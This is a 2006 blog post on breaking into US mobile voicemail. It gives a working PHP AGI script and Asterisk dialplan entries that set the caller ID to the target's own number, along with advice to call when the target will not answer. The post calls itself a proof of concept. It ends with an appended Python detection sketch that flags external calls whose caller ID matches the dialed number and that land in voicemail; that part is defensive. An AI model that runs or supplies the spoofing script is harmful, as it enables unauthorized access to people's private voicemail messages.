Hacking mobile voicemail with Asterisk and caller ID spoofing
Posted on Sep 25, 2006
So there has always been a problem with US mobile providers: their voicemail is susceptible to being compromised by someone calling with a spoofed caller ID. Apparently most providers' caller ID apps just check the referring caller ID and don't force the voicemail user to pick a passcode, so someone can trick the voicemail app into believing they are calling from a trusted number.
This has been covered all over the Internet and was in the spotlight a while back when it was alleged that this was how Paris Hilton's mobile phone was hacked. It is a pretty big problem and is probably really easy to fix.
So, just to make things funnier - I decided that I would release a snippet of code that would make it easier to execute this hack.
#!/asterisk/php/bin/php -q
<?
set_time_limit(30); // make sure the php script doesn't time out
require('phpagi.php'); // include the phpagi class
error_reporting(E_ALL); // report all errors
$agi = new AGI(); // instantiate the AGI class
$agi->answer(); // answer the phone
sleep(2); // wait a sec or two
$agi->stream_file('enter_spoof'); // speak a wav file that says "enter the number"
$result = $agi->get_data('beep', 3000, 10); // beep and grab the 10 numbers
$agi->verbose("Number to call:".$result['result']); // throw info so you know what's up
$agi->set_callerid($result['result']); // set caller id to the number you are calling
$agi->exec("Dial IAX2/iax-provider/1".$result['result']); // call the number
?>
You can add this to your /var/lib/asterisk/agi-bin dir and then specify the extension you want to use to dial and execute the php/agi script:
exten => 666,1,Answer
exten => 666,2,AGI(tmobilevoicemail_spoof.php)
exten => 666,3,Hangup
Then when you dial 666 it executes the script. It will ask you what number to dial, then dial it after setting the caller ID to the same number. It will dial the number and then ring the phone. If the phone is on and the target number is answered - it won't work; however, if the person doesn't answer you will be placed in the target's voicemail as a trusted user. So, I would suggest calling people in the middle of the night or when you know they will not answer. Wait.. I actually wouldn't suggest calling anyone but yourself.
It seems to me that the only viable solution that will be compatible with all phones, people and providers is to force users to choose a passcode for their voicemail.
This is - of course - a proof of concept. You should not actually hack people's voicemails. That is not very nice. We are into being nice.
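Because the script sets the caller ID to the same number it dials, the call leaves a recognizable trace on the receiving side: a call from an external trunk whose caller ID equals the called number and that ends up in voicemail. The following detection sketch is an added example, not part of the original post; the CSV column names, trunk names and sample records are constructed assumptions, not any provider's real CDR format.

```python
import csv
import io

# Constructed sample call records (not real data). Columns are assumptions:
# ingress trunk, calling number (caller ID), called number, disposition.
SAMPLE_CDR = """trunk,calling,called,disposition
internal,5035550101,15035550101,VOICEMAIL
iax-peer-7,5035550123,15035550123,VOICEMAIL
iax-peer-7,5035550188,15035550123,VOICEMAIL
pstn-gw-2,+1 (503) 555-0142,15035550142,VOICEMAIL
pstn-gw-2,5035550142,15035550142,ANSWERED
pstn-gw-2,,15035550199,VOICEMAIL
"""

# Assumption: a subscriber's own handset only reaches voicemail via this trunk.
TRUSTED_TRUNKS = {"internal"}


def normalize_nanp(number):
    """Reduce a NANP number to 10 digits so 5035550123 and 15035550123 compare equal."""
    digits = "".join(ch for ch in number if ch.isdigit())
    if len(digits) == 11 and digits.startswith("1"):
        digits = digits[1:]
    return digits if len(digits) == 10 else None


def is_suspicious(record):
    """Flag external calls whose caller ID equals the dialed number and that reach voicemail."""
    calling = normalize_nanp(record["calling"])
    called = normalize_nanp(record["called"])
    if calling is None or called is None:
        return False  # missing or malformed caller ID needs its own check
    return (
        record["trunk"] not in TRUSTED_TRUNKS
        and calling == called
        and record["disposition"] == "VOICEMAIL"
    )


def find_spoofed_self_calls(cdr_text):
    """Return the records from a CSV export that match the self-call pattern."""
    return [r for r in csv.DictReader(io.StringIO(cdr_text)) if is_suspicious(r)]


if __name__ == "__main__":
    for hit in find_spoofed_self_calls(SAMPLE_CDR):
        print("ALERT self-call from external trunk:", hit)
```

The normalization step matters because the script dials a leading 1 but sets a 10-digit caller ID, so a plain string comparison of the two fields would miss every such call.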
Also, check out my previous entry on caller id spoofing.